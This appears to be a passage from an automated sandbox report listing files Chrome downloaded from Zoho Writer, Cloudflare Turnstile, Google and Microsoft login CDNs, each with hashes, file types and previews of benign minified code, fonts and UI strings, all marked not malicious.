                                                    Preview:($WC=($WC=function(e){"use strict";function t(e,t){var s=Object.keys(e);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);t&&(i=i.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),s.push.apply(s,i)}return s}function s(e){for(var s=1;s<arguments.length;s++){var i=null!=arguments[s]?arguments[s]:{};s%2?t(Object(i),!0).forEach((function(t){u(e,t,i[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(i)):t(Object(i)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(i,t))}))}return e}function i(){i=function(){return t};var e,t={},s=Object.prototype,n=s.hasOwnProperty,a=Object.defineProperty||function(e,t,s){e[t]=s.value},o="function"==typeof Symbol?Symbol:{},r=o.iterator||"@@iterator",l=o.asyncIterator||"@@asyncIterator",d=o.toStringTag||"@@toStringTag";function c(e,t,s){return Object.defineProperty(e,t,{value:s,enumerable:!0,configurable:!0,writable:!0}),e[t]}try{c(
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (26610), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):26610
                                                    Entropy (8bit):5.19904949603076
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:325F1701AE4138B57C11FCD677F313D7
                                                    SHA1:5DFE12581F9CE3A4227ED94DBC78B106EC4CC422
                                                    SHA-256:53940FAA30E34AF4B50B67F43D4A09846B7ED203110843F2B0F03EDBD081E1EB
                                                    SHA-512:92AA5F36C2B153978871B080DCDFD09AB54364420897C4E11DB017266BB8A7210B1AC92308F0EB907A56A6DC931A61F3A2C304A66FE5C7E8B753F0103BB4B559
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/writer3/js/fcomponents_editor_common.325f1701ae4138b57c11fcd677f313d7.js
                                                    Preview:var FCWebFontsInfo=function(){var a={ABeeZee:{4:1,41:2},Abel:{4:1},"Abhaya Libre":{4:1,5:3,6:4,7:5,8:6},"Abril Fatface":{0:1,4:1},Aclonica:{4:1},Actor:{4:1},Adamina:{0:2,4:1},"Advent Pro":{1:7,2:8,3:9,4:1,5:3,6:4,7:5},"Aguafina Script":{0:1,4:1},Aileron:{1:7,2:17,3:9,4:1,6:4,71:14,7:5,8:18,41:2,9:19,11:16,81:15,21:10,91:12,61:13,31:11},Alef:{4:1,7:5},Alegreya:{0:2,81:20,51:21,4:1,5:3,7:5,71:14,8:6,9:19,41:2,91:12},Aleo:{0:2,3:9,4:1,7:5,71:14,41:2,31:11},"Alfa Slab One":{0:2,4:1},Alice:{0:2,4:1},"Alike Angular":{0:2,4:1},Allan:{0:1,4:1,7:5},Allerta:{4:1},"Allerta Stencil":{4:1},Allura:{0:1,4:1},Almarai:{3:9,4:1,7:5,8:6},Amaranth:{4:0,7:5,71:14,41:2},"Amatic SC":{0:1,4:1,7:5},Amiri:{0:2,4:1,7:5,71:14,41:2},Andika:{4:1},"Anonymous Pro":{4:0,7:5,71:14,41:2},Antic:{4:1},"Antic Didone":{0:2,4:1},"Antic Slab":{0:2,4:1},Anton:{4:1},Arapey:{0:2,4:1,41:2},"Arbutus Slab":{0:2,4:1},"Architects Daughter":{0:1,4:0},Archivo:{51:21,4:1,5:3,6:4,7:5,71:14,41:2,61:13},"Archivo Black":{4:1},"Archivo Narro
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):1195489
                                                    Entropy (8bit):5.325864149397519
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:00F91719623BC05A4E2003265BD2A43D
                                                    SHA1:0BE10C69819145E32DFE7073B99DA92A672C6874
                                                    SHA-256:6A7E1506B0BCF8B35B79348CF2ACA68ADA7E2CABCFBB0C7131972AC1CB2ED420
                                                    SHA-512:8F2D4F8B2246A6E47DF84DF802BB70BEE11F9B74E4CF919CFB90C6AD7F140743DCB4887ABE1EEE8ACAF44B55EFC23CF04F8ABCC9D4629D2FCE9908B0E48861AA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/writer3/js/components_min_all.00f91719623bc05a4e2003265bd2a43d.js
                                                    Preview:var ZDOMUtil=function(t){var e=void 0;return{init:function(t){e={div:document.createElement("div")}},clone:function(t){return e[t].cloneNode()}}}(window),ZComponents=function(t){var e=!0,i=navigator.userAgent.toLowerCase(),s=document.createElement("div"),o=document.createTextNode(" ");return{version:"5_2_60",isRTL:!1,selector:"data-ctype",userAgent:i,DOMUtil:t,locale:navigator.language,zIndex:1e3,$document:t(document),$window:t(window),hasHandlebars:!!window.Handlebars,keys:{},localeInfo:{"en-US":{daysAbbreviated:["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],days:["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],months:["January","February","March","April","May","June","July","August","September","October","November","December"],monthsAbbreviated:["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],firstDayOfWeek:0,dateFormat:{short:"M/d/yyyy",medium:"MMM d, yyyy",long:"MMMM d, yyyy",full:"dddd, MMMM d, yyyy"},timeFormat:{short:"h:mm tt",medium
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):1016763
                                                    Entropy (8bit):5.084096177428862
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:88CD99376556222B3264A6860172EEF5
                                                    SHA1:0881C52B856D551AC50BBA7CB591DE3F1C74B6B1
                                                    SHA-256:6E66E4C0A5498B94160AF4801B3E669A5379B884E7B550F4D54ADA6109B65A14
                                                    SHA-512:23F8FB511DED0FCF64BC6C90FC174E6DEF9D5C5DC38673AC8C9D3798959CEF204B7079A3B969C0D58BB9F8E1DF76F2866B77895F7A466E67E6E0FB8B4D78EB81
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/writer3/styles/writer_min_all.88cd99376556222b3264a6860172eef5.css
                                                    Preview:@-webkit-keyframes zeffectsMove{from{margin-left:-40%}to{margin-left:100%}}@-moz-keyframes zeffectsMove{from{margin-left:-40%}to{margin-left:100%}}@-ms-keyframes zeffectsMove{from{margin-left:-40%}to{margin-left:100%}}@-o-keyframes zeffectsMove{from{margin-left:-40%}to{margin-left:100%}}@keyframes zeffectsMove{from{margin-left:-40%}to{margin-left:100%}}.zeffects--move{-webkit-animation-name:zeffectsMove;-moz-animation-name:zeffectsMove;-ms-animation-name:zeffectsMove;-o-animation-name:zeffectsMove;animation-name:zeffectsMove;-webkit-animation-duration:2s;-moz-animation-duration:2s;-ms-animation-duration:2s;-o-animation-duration:2s;animation-duration:2s;-webkit-animation-delay:0;-moz-animation-delay:0;-ms-animation-delay:0;-o-animation-delay:0;animation-delay:0;-webkit-animation-timing-function:ease-in-out;-moz-animation-timing-function:ease-in-out;-ms-animation-timing-function:ease-in-out;-o-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out;-webkit-animation-f
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (47520)
                                                    Category:downloaded
                                                    Size (bytes):47521
                                                    Entropy (8bit):5.398500199255723
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:301F68F3D8317AB22D4021E266C9A853
                                                    SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                                    SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                                    SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.js
                                                    Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (976), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):976
                                                    Entropy (8bit):4.539367895469822
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:09682059466F48043652A3EC112EB948
                                                    SHA1:946B0F6CA01D0F9899D4B0E09B35C4BCED89D19B
                                                    SHA-256:58AB4F87042F16255891D26C16E9FC52E23EAF661D6580FEA7406DA5DAAA73D8
                                                    SHA-512:4A1BA279A0A905E0385F3B0556978C9817FE4A7CCDD93269D270F43BC9725A5C97C30748EBFB3E5EBEA66C6B50D1F2911BAC50058F7E0E13D2C92EBC881AD05D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISwAQJvmQKaLur9fESBQ0OSxGBEgUN6eNTdBIFDR3cwiISBQ2C9fguEgUNkWGVThIFDe301u4SBQ2RYZVOEgUN2KsWJRIFDZFhlU4SBQ1hzte8EgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ1ATKydEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNrzE0ixIFDWKNrIASBQ2DZL2uEgUNkWGVThIFDRvocN0SBQ2RYZVOEgUNHXtDwhIFDZFhlU4SBQ21MyLnEgUNkWGVThIFDRVE7asSBQ3blMuDEgUNkWGVThIFDZFhlU4SBQ2vnEQIEgUNuqBweRIFDVSgS3oSBQ3eymHLEgUNkWGVThIFDTSnSUQSBQ3lf_iuEgUN0qMylBIFDRId30ESBQ0xrs1iEgUNkaeAuxIFDc3XTSoSBQ0LCXEREgUN06X0ChIFDYZyDWkSBQ2NcmJuEgUNkWGVThIFDYosYIESBQ2RYZVOEgUNBu27_xIFDWbPQwsSBQ2RYZVOEgUNgZDxfBIFDZFhlU4SBQ2BkPF8EgUNkWGVThIFDYGQ8XwSBQ2RYZVOEgUNgZDxfBIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNgZDxfBIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4=?alt=proto
                                                    Preview:CtkFCgcNDksRgRoACgcN6eNTdBoACgcNHdzCIhoACgcNgvX4LhoACgcNkWGVThoACgcN7fTW7hoACgcNkWGVThoACgcN2KsWJRoACgcNkWGVThoACgcNYc7XvBoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNQEysnRoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNrzE0ixoACgcNYo2sgBoACgcNg2S9rhoACgcNkWGVThoACgcNG+hw3RoACgcNkWGVThoACgcNHXtDwhoACgcNkWGVThoACgcNtTMi5xoACgcNkWGVThoACgcNFUTtqxoACgcN25TLgxoACgcNkWGVThoACgcNkWGVThoACgcNr5xECBoACgcNuqBweRoACgcNVKBLehoACgcN3sphyxoACgcNkWGVThoACgcNNKdJRBoACgcN5X/4rhoACgcN0qMylBoACgcNEh3fQRoACgcNMa7NYhoACgcNkaeAuxoACgcNzddNKhoACgcNCwlxERoACgcN06X0ChoACgcNhnINaRoACgcNjXJibhoACgcNkWGVThoACgcNiixggRoACgcNkWGVThoACgcNBu27/xoACgcNZs9DCxoACgcNkWGVThoACgcNgZDxfBoACgcNkWGVThoACgcNgZDxfBoACgcNkWGVThoACgcNgZDxfBoACgcNkWGVThoACgcNgZDxfBoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNgZDxfBoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoA
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                    Category:downloaded
                                                    Size (bytes):16345
                                                    Entropy (8bit):7.98960525258912
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                    SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                    SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                    SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js
                                                    Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (65488), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):2064384
                                                    Entropy (8bit):5.510494546798708
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:62E588432CC04D5EB101E2F500226A6B
                                                    SHA1:CB329F11D38578B2D24792BA8E135C679158385C
                                                    SHA-256:F42D657BCFDD74B146D14E2D2FAD7DCF9FA0C271149A4F208ECD0C59B2E58112
                                                    SHA-512:98F7B9309A73693ED905104095C3338851109659120C2F676DDC3980B5874219877BAEC5E30AEAB70CBD73B247C8F6960C25DA5065617487B8D9D166B7AD1D29
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/writer3/js/common/writer_common_min_all.62e588432cc04d5eb101e2f500226a6b.js
                                                    Preview:function Soros(t,e){this.funcpat=/(\|?(\uE008\()+)?(\|?\uE008\(([^\(\)]*)\)\|?)(\uE00A?\)+\|?)?/,this.meta='\\"$()|#;[]',this.enc="..........",this.lines=[],/__numbertext__/.test(t)||(t="__numbertext__;"+t),t=t.replace("__numbertext__",'"([a-z][-a-z]* )?0+(0|[1-9]\\d*)" $(\\1\\2);".(.*).(.+).(.*)" \\1\\2\\3;"..*...*"'),this.linetype=function(t,e,i,n){this.pat=t,this.repl=e,this.begin=i,this.end=n},this.strip=function(t,e){return void 0==t?"":t.replace(new RegExp("^"+e+"+"),"").replace(new RegExp(e+"+$"),"")},this.tr=function(t,e,i,n){for(var r=0;r<e.length;r++)for(var s=n+e[r];t.indexOf(s)>=0;)t=t.replace(s,i[r]);return t},this._run=function(t,e,i){for(var n in this.lines){var r=this.lines[n];if(!(!e&&r.begin||!i&&r.end)){var s=r.pat.exec(t);if(null!=s){for(var o=t.replace(r.pat,r.repl),a=this.funcpat.exec(o);null!=a;){var l=!1,c=!1;"|"==a[3][0]||"|"==a[0][0]?l=!0:0==a.index&&(l=e),"|"==a[3][a[0].length-1]||"|"==a[3][a[0].length-1]?c=!0:a.index+a[0].leng
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 217756, version 2.983
                                                    Category:downloaded
                                                    Size (bytes):217756
                                                    Entropy (8bit):7.997530588255612
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:44C28D35ECA4C6C2F9DBE34FAB8CC3BF
                                                    SHA1:21045B6AF1EBA241B82F6EBE900682063D33F437
                                                    SHA-256:4833CB8B714B5D182A728353C3933648C9A5484A09873D7B5A803A40A94A6691
                                                    SHA-512:FCFA22A727092050E6E95009A94CCCFA14606D6E218598F597E60F46AF76C93AEE5EE43B45A2925D5BD02601EDA974D7594D0A72311729C05E4DE240169FBFB8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/lato2semibold/font.woff2
                                                    Preview:wOF2......R.......3...R9..............................l.`..&..f...........B.6.$..<..@.. ..J. ..9[.\.._...9.@...6..q_.5.=...yR...U}...N.......R...Bh..1..@..Ki....1..L.].k.d...~..................................h."N{.9.d'm.....p;....D....I...x.....LEQ:.0C.BBY..K.l Q.......d.UV....EB..........g....XsKkC...hZ....ZK.jr..l.D].j.N......e.K.^.C...1k-..R.......R...0.A.x....E.4..j.0IS.hf6W..4..xI...96.ZxX..~........TEB.Hh....l&].&.u ...VZ..cADkb..[...A..k6.I.P.fe<..V.Fw.....V.l. .p?s.Z.. ..k...mfkvJ....[...S.)?ha....C.H.g..]A.U<..c.2).4.....$.P...vbB.O...R...F....n.9v.l......R.h..Q&......V%.Y.)..T.".Hh..x{4.&q......$HH.3......)....TS+s.0..VlQ3)...eu.:iZ..$H..4.l...M.CI.G.*:M..3..*Rm.7'U......pSP..YE....$.y....^-a.u( .J^..V.S.$...s...e.S..E..R$.t.].z..eZ.y.d/.l^..N.._.......Yp..P..............Br.)V.~:...S..*U......4@u\I.5.6..En5.....d.W.....v.x....."...*..I.\.m.......P.z.P.J.. 5..^....8?..l..*..b.#...*LH.TUT....N[...)...]6.$..|....j.....H.<..(SK.......O.B.H.J.1...c:.....
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):275391
                                                    Entropy (8bit):5.2827771208954575
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7CE83F5EC6B0048FBB799E4AADE1AFE1
                                                    SHA1:853F67E45A94ABCEC3E2830A11B6BD9E67964F92
                                                    SHA-256:3A9148AACF470A07F9D5F7735A83F4B873CDF7EE32209A75FF6C1136CA0C54F0
                                                    SHA-512:6FEEE56810DE0C56FF6106CF0DCCDB3A041DB63743A799AB566806BA54FCCACE27F3D056CBDBFC1A7B0178A667F0FB35A725C3F7661AD3E97545F9F37EF685FA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/writer3/js/messageResource/messageResources_en_US.7ce83f5ec6b0048fbb799e4aade1afe1.js
                                                    Preview:var ZW_I18n={"fillable": {"FILLABLE_SETTINGS": "Fillable settings", "SUBMITTER_DETAILS_MISSING_MSG": "Please enter both details to continue signing the document.", "FORM_SUBMIT_ACTIONS": "Form submit actions"}, "feedback": {"MSG4": "Get personalized help from the {0} Team...", "REMOVE_ATTACH_FAILURE": "There was a problem removing your file. Please try again in a while.", "ATTACH_SIZE_MSG": "Please make sure the size of your attachment is {0} MB or less.", "HELP": "Help", "MSG3": "Pass on some words of appreciation to the {0}...", "PLEASE_ATTACH_FILE_BELOW": "Please attach a file below", "HELP_TOPICS_LOAD_ERROR_MSG": "We're unable to load User Guide topics right now.", "SUGGESTIONS": "Suggestion", "MSG2": "Tell us how we can make {0} better...", "FEEDBACK_FAILURE_MSG": "The query wasn't submitted successfully. Please try again. If the issue persists, please write to us at {0} directly.", "MSG1": "Details about the issue you've come across in {0}...", "APPRECIATION": "Appreciation", "AD
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 67488, version 2.8978
                                                    Category:downloaded
                                                    Size (bytes):67488
                                                    Entropy (8bit):7.996933785927075
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:6D701900D906466E921E55A7BCB61BA4
                                                    SHA1:6420BD127C0357CA60AAF4FFBD3654E8361EED1B
                                                    SHA-256:BB32AF6099241B1AF42D3D488B00E897C8C1D64A356596A279B468844A4A82AF
                                                    SHA-512:A51C932B2336EAE87215F165E2E083B2AEA70145F9489588C109DE7EE974B11A446A6C9A9B49120A7B3062310AF97F2F2F544B442E02B71C679E846ABAF758EA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/robotoblack/font.woff2
                                                    Preview:wOF2...................8..#.....................?FFTM..~...$..L.`....Z..<.....@..2.6.$..8..... ..f..f..8[.....r......7y..v..0....l.eH:._....'...!YSw..b'[3p........"[...u....$....B9.n...~..<.F}.k.c...u..Q.u.O.tF;8.J.../........q...].5..h.aR.)mG..oF[..Se..].!..6.....8.0. M..\w..<....h......x[..3_Q....ih.F....$.r....79..Y.V.A....4......n.~K.*.......2K...z3.a^?..W..U..{D.1...s...t67.9.q..i(,L.l. ."'INC.eRv.>e.......lg..t...|A./mh.K.O....z..~.f.....>.....2...k4.5...........Qlo?...R..n.....MD..On._8w3q&z..DgK.......rQq.......r..T...ug...<".q...H.M...r.<..1.o~..s...$U -V.u..O.....SLg...a.......k.+r[....-i......`.../.q.K+o.....Ok.{n..3...=Q"Ltd,...G....uc.rD...`..Y..E.$zt.D).D..D.#......^.....g..\.) .b..@.qL.q,.U.1Kn...nr[$E..o..f..f....K..U..g.....F..H..p'....y.M....T...y...U.vj.3.u..2..h......q.D.x4.i.T...$..... ...[6.m.~......$XN."A,XN|}1*..Ii...)Dr.V`,.*...,..lgUrHY..........?.....?.......j..4.2..........Z.6BUx......C<A'.8=...TS1i*$.L&.i....V.A
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 67552, version 2.8978
                                                    Category:downloaded
                                                    Size (bytes):67552
                                                    Entropy (8bit):7.996618211599251
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:3EC9CFFD052CD51A5475C0FBCD805509
                                                    SHA1:E05434A0852F106A559B2AD1E98D282ABBFB3EC3
                                                    SHA-256:FAB270511B8978075514A01AB5DFFF5AE2C0F14BD770D00A0F6717A9C1BF8F11
                                                    SHA-512:3B74A3FD25F03089BFDEB6F0E37C900A5ED745B61A2A5BE57948BB96766DD186E5132B4E1F510197E47544DACCD3C44046980F8F15B653C9C5F58A2DFEA95E3E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/robotoregular/font.woff2
                                                    Preview:wOF2..................w..#.....................?FFTM..~...L..L.`....T..<.....$..s.6.$..8..... ..q..f..I[ ...*.....wv..5%...t..c..T.9V...`.U...m{P.v...........U.$............vu...@.4*...L..D.E.h..egP..{......#...Xx....!.$.....#...4..8.I,.W.N.6.M:.o.\%5..z....a.....R&.k..]...O.N~.'.w...>.{.2....h.....n....Hp:...u..<.#..O0u...ct.^..T..v.<.{).o.C+....=.l.....u..H...ps.......p.FG.4gbEb.Yl.K...Hc[...ub}swQ.w.bI..P....$j.J...? I.u.v.S.bS........?xd.....".a..O.*...%O.~`..6..N..].G6.....q..j..j.....r...x.|..B.iU%i.I..9.....=.q..8...........(...P..F...`N.m:.Z).D.....#..E..*F2@s.n..R!-F.....,P.....1.5lcT..Fm0.%..PL.A(s...^.p.e..`.Rc$....Z.....A......@...h....j|...`.......z.D.~....z._.....IQ.Rt.(]....>.R..%.B...H......s.w.Y>88B5.@-.<"A....?b....h.\..........D....s\...+....9.."&r.....\`.s.C....o~~.D.3]...>q*.6..12...6$R...*)C...0..0.C..S..U..UW.nf~L..c.h.4<.k..j#.N....C...f........J...56`...%....5..FD.@@6..A.P....UD.....;.dW.6...%....(.;.nU]ga..,.`.H
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:data
                                                    Category:downloaded
                                                    Size (bytes):18518
                                                    Entropy (8bit):5.320939706500565
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7BFC9722C30F37184705A9C0627BC047
                                                    SHA1:F192AE2AAD920DB92E0C6FBCBAE7911B02A59E9D
                                                    SHA-256:057E1752977179C42F61881662313B89779E0ABF3B75B356741E6375CC69CD7B
                                                    SHA-512:7117C735CC6E6A22068D2AACFE610CF2CCDE9363D9E36EE88014650D8E45C7173A50FF0D52165C823197D7B9E6517FB7C9EDBA07AA0014A953D9447D3FFB61F4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/writer3/js/writer_worker_min_all.7bfc9722c30f37184705a9c0627bc047.js
                                                    Preview:var chars="abcdefghijklmnopqrstuvwxyz0123456789",ZWWorkerUtils={};ZWWorkerUtils.randomString=function(e){for(var t=e||12,n="",r=0;r<t;r++){var a=Math.floor(Math.random()*chars.length);n+=chars.substring(a,a+1)}return n},ZWWorkerUtils.ajax=function(e){e=e||{url:""},e.type=e.type.toUpperCase()||"GET",e.headers=e.headers||{},e.timeout=parseInt(e.timeout)||0,e.success=e.success||function(){},e.error=e.error||function(){},e.async="undefined"==typeof e.async||e.async;var t=e.data,n="";for(var r in t)if(t.hasOwnProperty(r)){""!==n&&(n+="&");var a="";a=r,a+="=";var i=t[r];if(Array.isArray(i)){for(var s="",o=0;o<i.length;o++)0==o&&(s+="["),s+='"',s+=i[o],s+='"',o==i.length-1&&(s+="]");a+=s}else a+=i;n+=a}var l=new XMLHttpRequest;e.timeout>0&&(l.timeout=e.timeout,l.ontimeout=function(){e.error("timeout","timeout",l)}),l.open(e.type,e.url,e.async),l.setRequestHeader("Content-type","application/x-www-form-urlencoded; charset=UTF-8"),l.setRequestHeader("X-Requested-With","XMLHttpRequest");for(var o
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):965
                                                    Entropy (8bit):4.457608956771519
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A13A782355EC64B50D9B7447F7ECD1E4
                                                    SHA1:DB415D3FC440DFA49FF39CD7AD247E5C265452FA
                                                    SHA-256:C3825A19D25428D67DE61979936F683879E006D2FEF9C45E0304DFA0706FD95C
                                                    SHA-512:F0E57D8CB35E1E9CEAC25BD5B20D231DCEF9B06381E6667B7978559E17958941494B1AA1C26A300E9D946AA26B42F6CF40FFBAEEE0F4F7D2ACDED6E05168BB0E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/writer3/html/readaloud/readaloud.a13a782355ec64b50d9b7447f7ecd1e4.html
                                                    Preview:<div class="ui-flex-container ui-gap-10 js-readaloud-player">. <div class="ui-flex-container ui-flex-vcenter ui-gap-10">. <i class="js-ra-player-prev ui-ra-player-prev ui-ms-pointer"></i>. <i class="js-ra-player-btn ui-flex-container ui-flex-center ui-ra-player-pause ui-ms-pointer"></i>. <i class="js-ra-player-nxt ui-ra-player-nxt ui-ms-pointer"></i>. </div>. <div class="ui-ra-player-box-separator"></div>. <div class="ui-flex-container ui-flex-vcenter ui-ra-player-speed ui-gap-10">. <span class="js-ra-player-speed-minus ui-flex-container ui-flex-center ui-ra-player-speed-minus ui-icon ui-ms-pointer"></span>. <span id="js-speech-rate">1X</span>. <span class="js-ra-player-speed-plus ui-flex-container ui-flex-center ui-ra-player-speed-plus ui-icon ui-ms-pointer"></span>. </div>. <span class="js-ra-player-close ui-flex-container ui-flex-center ui-ra-player-box-close ui-ms-pointer"></span>.</div>.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (556), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):556
                                                    Entropy (8bit):4.724203386742943
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:64A21BE68F0C02330E7A1E096439FF5B
                                                    SHA1:8EAD05A07EF59B5B8745BBCEBC309632197C462C
                                                    SHA-256:FB6A96BA5491FB83E087DADFB89982A484CB224D6B8B692468417194F81DDD7E
